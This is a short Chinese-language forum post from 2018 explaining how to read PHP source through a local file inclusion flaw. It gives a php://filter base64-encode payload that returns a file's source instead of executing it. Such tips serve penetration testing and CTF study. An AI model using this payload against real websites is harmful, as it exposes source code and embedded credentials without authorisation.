zhouer 发表于 2018-12-20 12:36:13

lfi 读取php源码

  

  a.com/a.php?a=../0x007.php如果是这样写的会当作php来执行 并不会看到源码。
  今天我所说的是 不让0x007.php执行看到的是0x007.php的源码
  利用php:filter//来读取
  php://filter/read=convert.base64-encode/resource=../0x007.php 这样读取出来是源码不进行执行。




页: [1]
查看完整版本: lfi 读取php源码